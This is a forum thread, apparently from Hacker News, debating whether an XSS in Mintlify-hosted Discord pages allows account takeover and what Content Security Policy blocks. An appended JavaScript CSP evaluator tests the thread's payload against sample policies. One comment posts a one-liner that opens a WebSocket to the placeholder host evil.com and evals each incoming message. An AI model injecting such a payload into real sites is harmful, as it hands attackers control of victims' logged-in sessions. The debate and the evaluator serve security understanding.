rainonmoon 14 hours ago
XSS is categorically not an RCE, and my point is that mitigations exist which make "It allows you to run any action as if you were the owner of the account" an unwarranted assumption. The writeup shows that it's possible to pop an alert box. That doesn't tell you anything about what's actually possible. Obviously Discord got enough information to take it seriously, but extrapolating that to suggest every third party using Mintlify is vulnerable to account takeover is highly dubious based on what's presented.

rvnx 14 hours ago
Well, llmslave2 is right. If discord.com executes JavaScript to conduct user actions, and you can execute JavaScript on discord.com, you are acting on the account as if you were discord.com.

rainonmoon 13 hours ago
Except discord.com doesn't execute JavaScript, the user's browser does. These are meaningful distinctions that delineate the impact. You aren't "discord.com" if you target someone with an XSS exploit, you've only run a script in a user's session. Whether you can actually do anything with that script or not decides whether you can take over the account or not.

rvnx 13 hours ago
Yes, I agree, it's a cool discovery though.

llmslave2 13 hours ago
Everybody knows that XSS is a client-side exploit. You're acting naive by pretending that we're claiming it gives access to a server and ignoring the fact that having control of the client gives you de facto control of whatever account is logged into the client.

rvnx 13 hours ago
It is not as cool as the RPC exploit of React/Next.js where you could call any function on the server side, including "vm.sysexec" or whatever it was, but still not to be fully ignored.

llmslave2 13 hours ago
How is XSS not remote code execution? You can do anything, from sending fetch requests to the server with full credentials to logging keystrokes, or even opening a tunnel and evaluating payloads... Anything the user can do, you can do via an XSS attack.

collinmanderson an hour ago
Generally, code execution within the browser/client-side JavaScript sandbox is just "XSS". RCE usually implies server-side code execution (or breaking out of the browser sandbox).

rainonmoon 13 hours ago
Show me where you can "open a tunnel" using the XSS in this post.

> Anything the user can do, you can do via an XSS attack.

I just explained why this isn't a reasonable assumption. You seem to have multiple fundamental misunderstandings about web application security, so I don't think it's constructive for either of us to continue this conversation.

llmslave2 13 hours ago
> Show me where you can "open a tunnel" using the XSS in this post.

new WebSocket("ws://evil.com").addEventListener("message", e => eval(e.data))

> You seem to have multiple fundamental misunderstandings about web application security

Lol yeah sure buddy

rainonmoon 12 hours ago
Go to Discord and paste that into your console. None of us will hold it against you if you come back and delete these comments once you learn about Content Security Policy.

llmslave2 11 hours ago
Maybe you should read up on what CSP can and can't do. Once an attacker can execute arbitrary code, they can do anything the client can.
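
As an added example that is not part of the thread (the policies, hostnames and paths in it are constructed for illustration, and none of them is Discord's actual header), here is a small JavaScript evaluator for the Content Security Policy rules the last few comments argue over. It parses a policy, applies the default-src fallback and CSP3 source-expression matching (scheme, host, wildcard subdomain, port, 'self'), and reports three things about the posted payload: whether `new WebSocket("ws://evil.com")` can connect under connect-src, whether `eval` runs (script-src without 'unsafe-eval' blocks it), and whether a credentialed fetch to the page's own origin is still permitted, which any policy that lets the app call its own API necessarily allows.

```javascript
// Added example, not from the thread: a minimal CSP evaluator for the
// question argued above, namely what `new WebSocket("ws://evil.com")` plus
// `eval` can do under a given Content-Security-Policy header.
// All policies and origins below are constructed; none is Discord's real CSP.

function parseCsp(header) {
  // "connect-src 'self' wss://x; script-src 'self'" -> { "connect-src": [...], ... }
  const policy = {};
  for (const part of header.split(";")) {
    const [name, ...sources] = part.trim().split(/\s+/).filter(Boolean);
    if (name) policy[name.toLowerCase()] = sources;
  }
  return policy;
}

// Fetch directives (connect-src, script-src, ...) fall back to default-src.
// A null result means no directive governs the request, so it is allowed.
function effectiveSources(policy, directive) {
  return policy[directive] ?? policy["default-src"] ?? null;
}

// CSP3 scheme matching: an insecure scheme in the expression also matches
// its secure counterparts (http -> https, ws -> wss/http/https, wss -> https).
function schemeMatches(exprScheme, urlScheme) {
  if (exprScheme === urlScheme) return true;
  if (exprScheme === "http") return urlScheme === "https";
  if (exprScheme === "ws") return ["wss", "http", "https"].includes(urlScheme);
  if (exprScheme === "wss") return urlScheme === "https";
  return false;
}

// host-source: [scheme://]host-or-wildcard[:port|:*][/path]
const HOST_SOURCE = /^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*|(?:\*\.)?[^:\/*]+)(?::(\*|\d+))?(?:\/.*)?$/i;

function sourceMatches(expr, url, origin) {
  const urlScheme = url.protocol.slice(0, -1);
  const originScheme = origin.protocol.slice(0, -1);
  if (expr === "*") return ["http", "https", "ws", "wss"].includes(urlScheme);
  if (expr === "'self'") {
    // same host and port; an https page may also reach https/wss, an http page http/https/ws/wss
    const schemeOk = urlScheme === originScheme ||
      (originScheme === "https" && urlScheme === "wss") ||
      (originScheme === "http" && ["https", "ws", "wss"].includes(urlScheme));
    return schemeOk && url.hostname === origin.hostname && url.port === origin.port;
  }
  if (expr.startsWith("'")) return false;              // 'none', 'unsafe-*', nonces, hashes
  if (/^[a-z][a-z0-9+.-]*:$/i.test(expr)) {            // scheme-source such as "wss:"
    return schemeMatches(expr.slice(0, -1).toLowerCase(), urlScheme);
  }
  const m = HOST_SOURCE.exec(expr);
  if (!m) return false;
  const [, scheme, host, port] = m;
  if (!schemeMatches((scheme ?? originScheme).toLowerCase(), urlScheme)) return false;
  const h = host.toLowerCase();
  const hostOk = h === "*" ||
    (h.startsWith("*.") ? url.hostname.endsWith(h.slice(1)) : url.hostname === h);
  if (!hostOk) return false;
  if (port === "*") return true;
  return (port ?? "") === url.port;                    // URL.port is "" for the default port
}

function isAllowed(policy, directive, urlString, originString) {
  const sources = effectiveSources(policy, directive);
  if (sources === null) return true;
  const url = new URL(urlString), origin = new URL(originString);
  return sources.some((expr) => sourceMatches(expr, url, origin));
}

// What the one-line payload from the thread can and cannot do under a policy.
function evaluatePayload(header, pageOrigin) {
  const policy = parseCsp(header);
  const scriptSources = effectiveSources(policy, "script-src");
  return {
    websocketToEvil: isAllowed(policy, "connect-src", "ws://evil.com/", pageOrigin),
    evalAllowed: scriptSources === null || scriptSources.includes("'unsafe-eval'"),
    // a credentialed fetch to the page's own origin (hypothetical path)
    fetchOwnApi: isAllowed(policy, "connect-src", pageOrigin + "/api/session", pageOrigin),
  };
}

// Constructed sample policies (hypothetical, not any real site's header).
const NO_CSP = "";
const STRICT_CSP =
  "default-src 'self'; connect-src 'self' https://*.example.com wss://gateway.example.com; " +
  "script-src 'self'";
const LAX_CSP = "default-src *; script-src 'self' 'unsafe-eval'";

for (const [name, csp] of [["none", NO_CSP], ["strict", STRICT_CSP], ["lax", LAX_CSP]]) {
  console.log(name, evaluatePayload(csp, "https://app.example.com"));
}
```

Run it with node. Under the constructed strict policy the WebSocket to evil.com and the eval are both refused, so that particular tunnel does not work; under the lax one both go through. In every case the same-origin credentialed fetch is allowed, because a connect-src that lets the app talk to its own API cannot distinguish the injected script from the app's own code. That is the part of the impact a CSP does not settle; it depends on what the site's own endpoints let a logged-in session do.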